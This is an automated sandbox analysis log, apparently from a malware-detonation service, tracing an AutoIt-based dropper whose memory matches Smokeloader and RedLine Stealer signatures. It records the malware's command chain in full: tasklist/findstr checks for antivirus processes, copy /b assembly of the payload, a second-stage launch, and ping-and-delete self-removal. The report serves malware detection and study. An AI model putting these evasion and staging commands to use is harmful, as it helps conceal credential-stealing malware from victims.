Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: String function: 00410EE9 appears 129 times
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: String function: 00288B30 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: String function: 00411860 appears 55 times
One or more processes crash
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 804
PE / OLE file has an invalid certificate
Source: hlyG1m5UmO.exe Static PE information: invalid certificate
Sample file is different than original file name gathered from version info
Source: hlyG1m5UmO.exe, 00000000.00000003.2102681446.0000000002912000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAutoIt3.exeB vs hlyG1m5UmO.exe
Uses 32bit PE files
Source: hlyG1m5UmO.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 00000010.00000002.3348010697.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000010.00000002.3347378928.00000000006B3000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: ScreenUpdateSync[1].exe.15.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 1248.tmp.exe.15.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: hlyG1m5UmO.exe Static PE information: Section: .reloc ZLIB complexity 1.002685546875
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@48/101@2/4
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002CA6AD GetLastError,FormatMessageW, 15_2_002CA6AD
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002B8DE9 AdjustTokenPrivileges,CloseHandle, 15_2_002B8DE9
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002B9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 15_2_002B9399
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004044A5
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002C4148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 15_2_002C4148
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Code function: 0_2_004024FB CoCreateInstance, 0_2_004024FB
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002C443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx, 15_2_002C443D
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\track_prt[1].htm Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6020
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4500:120:WilError_03
Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Mutant created: \Sessions\1\BaseNamedObjects\prtscreen1566
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5168:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2836:120:WilError_03
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe File created: C:\Users\user\AppData\Local\Temp\nsfA451.tmp Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Accepting Accepting.bat & Accepting.bat
Source: hlyG1m5UmO.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.16.dr, softokn3.dll.16.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: 1248.tmp.exe, 00000010.00000002.3373657073.000000006C36F000.00000002.00000001.01000000.0000000C.sdmp, 1248.tmp.exe, 00000010.00000002.3373228460.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 1248.tmp.exe, 00000010.00000002.3360242480.000000001ADD9000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.16.dr, nss3[1].dll.16.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.16.dr, softokn3.dll.16.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: 1248.tmp.exe, 00000010.00000002.3373657073.000000006C36F000.00000002.00000001.01000000.0000000C.sdmp, 1248.tmp.exe, 00000010.00000002.3373228460.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 1248.tmp.exe, 00000010.00000002.3360242480.000000001ADD9000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.16.dr, nss3[1].dll.16.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 1248.tmp.exe, 00000010.00000002.3373657073.000000006C36F000.00000002.00000001.01000000.0000000C.sdmp, 1248.tmp.exe, 00000010.00000002.3373228460.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 1248.tmp.exe, 00000010.00000002.3360242480.000000001ADD9000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.16.dr, nss3[1].dll.16.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: 1248.tmp.exe, 00000010.00000002.3373657073.000000006C36F000.00000002.00000001.01000000.0000000C.sdmp, 1248.tmp.exe, 00000010.00000002.3373228460.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 1248.tmp.exe, 00000010.00000002.3360242480.000000001ADD9000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.16.dr, nss3[1].dll.16.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.16.dr, softokn3.dll.16.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.16.dr, softokn3.dll.16.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.16.dr, softokn3.dll.16.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.16.dr, softokn3.dll.16.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.16.dr, softokn3.dll.16.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: 1248.tmp.exe, 1248.tmp.exe, 00000010.00000002.3373657073.000000006C36F000.00000002.00000001.01000000.0000000C.sdmp, 1248.tmp.exe, 00000010.00000002.3373228460.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 1248.tmp.exe, 00000010.00000002.3360242480.000000001ADD9000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.16.dr, nss3[1].dll.16.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: 1248.tmp.exe, 00000010.00000002.3373657073.000000006C36F000.00000002.00000001.01000000.0000000C.sdmp, 1248.tmp.exe, 00000010.00000002.3373228460.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 1248.tmp.exe, 00000010.00000002.3360242480.000000001ADD9000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.16.dr, nss3[1].dll.16.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: 1248.tmp.exe, 00000010.00000002.3373228460.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 1248.tmp.exe, 00000010.00000002.3360242480.000000001ADD9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.16.dr, softokn3.dll.16.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: 1248.tmp.exe, 00000010.00000003.3134536778.000000000078D000.00000004.00000020.00020000.00000000.sdmp, 1248.tmp.exe, 00000010.00000003.3134178659.0000000020EB5000.00000004.00000020.00020000.00000000.sdmp, 1248.tmp.exe, 00000010.00000003.3123190963.0000000020E99000.00000004.00000020.00020000.00000000.sdmp, ECBAEBGHDAECBGDGCAKE.16.dr, JEGHDAFIDGDAAKEBFHDA.16.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 1248.tmp.exe, 00000010.00000002.3373228460.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 1248.tmp.exe, 00000010.00000002.3360242480.000000001ADD9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.16.dr, softokn3.dll.16.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: 1248.tmp.exe, 00000010.00000002.3373228460.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 1248.tmp.exe, 00000010.00000002.3360242480.000000001ADD9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.16.dr, softokn3.dll.16.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: hlyG1m5UmO.exe Virustotal: Detection: 10%
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe File read: C:\Users\user\Desktop\hlyG1m5UmO.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\hlyG1m5UmO.exe "C:\Users\user\Desktop\hlyG1m5UmO.exe"
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Accepting Accepting.bat & Accepting.bat
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 464151
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "DHappenedWestminsterUnexpected" Heat
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Theaters + ..\Keeping + ..\Estimate + ..\Tribute + ..\Nails + ..\Kingdom + ..\New + ..\Tears + ..\Zoo V
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Blank.pif V
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Process created: C:\Users\user\AppData\Local\Temp\464151\Blank.pif C:\Users\user\AppData\Local\Temp\464151\Blank.pif
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Process created: C:\Users\user\AppData\Local\Temp\1248.tmp.exe "C:\Users\user\AppData\Local\Temp\1248.tmp.exe"
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 804
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 804
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 856
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 864
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 992
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1000
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1260
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 2200
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 2200
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 2348
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 2416
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\LocalCGIDAAAKJJ.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe "C:\Users\user\AppData\LocalCGIDAAAKJJ.exe"
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 2364
Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\user\AppData\LocalCGIDAAAKJJ.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 2.2.2.2 -n 1 -w 3000
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Accepting Accepting.bat & Accepting.bat Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 464151 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "DHappenedWestminsterUnexpected" Heat Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Theaters + ..\Keeping + ..\Estimate + ..\Tribute + ..\Nails + ..\Kingdom + ..\New + ..\Tears + ..\Zoo V Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Blank.pif V Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Process created: C:\Users\user\AppData\Local\Temp\464151\Blank.pif C:\Users\user\AppData\Local\Temp\464151\Blank.pif Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Process created: C:\Users\user\AppData\Local\Temp\1248.tmp.exe "C:\Users\user\AppData\Local\Temp\1248.tmp.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\LocalCGIDAAAKJJ.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe "C:\Users\user\AppData\LocalCGIDAAAKJJ.exe"
Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\user\AppData\LocalCGIDAAAKJJ.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 2.2.2.2 -n 1 -w 3000
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Section loaded: iconcodecservice.dll Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: windows.storage.dll Jump to behavior
